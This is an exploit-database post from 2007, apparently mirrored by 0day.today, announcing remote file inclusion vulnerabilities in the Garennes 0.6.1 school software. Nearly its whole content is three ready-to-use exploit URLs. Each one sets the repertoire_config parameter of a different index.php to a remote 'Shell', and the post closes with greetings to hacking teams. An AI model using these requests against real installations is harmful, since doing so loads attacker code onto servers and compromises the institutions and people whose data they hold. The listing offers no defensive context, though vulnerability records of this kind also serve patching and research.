id: 1753
date: 04/12/2007
title: Garennes 0.6.1 (repertoire_config) Remote File Inclusion Vulnerabilities
author: GoLd_M
cves: 

========================================================================
Garennes 0.6.1 (repertoire_config) Remote File Inclusion Vulnerabilities
========================================================================



# Garennes 0.6.1 <= Remote File Include Vulnerablites
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/cpe/index.php?repertoire_config=Shell
# Exploit:[Path]/direction/index.php?repertoire_config=Shell
# Exploit:[Path]/professeurs/index.php?repertoire_config=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group



#  0day.today [2023-03-23]  #